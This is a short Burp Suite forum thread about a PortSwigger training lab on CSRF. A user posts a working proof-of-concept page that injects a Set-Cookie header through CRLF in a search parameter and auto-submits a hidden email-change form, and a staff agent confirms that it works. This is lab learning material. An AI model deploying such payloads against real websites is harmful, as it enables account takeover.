The Burp Suite User Forum will be discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Centre. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTRE DISCORD

Create new post

Cannot solve lab "CSRF where token is duplicated in cookie"

HieuNgTe | Last updated: Jan 05, 2024 04:50PM UTC

I cannot solve lab "CSRF where token is duplicated in cookie" This is my CSRF POC: <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="https://0a310063031c4c6282ee29fc0064006f.web-security-academy.net/my-account/change-email" method="POST"> <input type="hidden" name="email" value="wiener&#64;normal&#45;user&#46;net" /> <input type="hidden" name="csrf" value="csrftest" /> <input type="submit" value="Submit request" /> </form> <img src="https://0a310063031c4c6282ee29fc0064006f.web-security-academy.net/?search=test%0d%0aSet-Cookie:csrf=csrftest%3b%20SameSite=None" onerror="document.forms[0].submit();"/> </body> </html>

Ben, PortSwigger Agent | Last updated: Jan 08, 2024 11:26AM UTC

Hi Nguyễn, Your exploit appears to work when I use it. Have you previously used the 'View exploit' functionality to test the exploit on your own account? If so, you would need to alter the email address in the exploit as, as noted in the Hint shown in the lab, two users cannot have the same email address associated with them.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.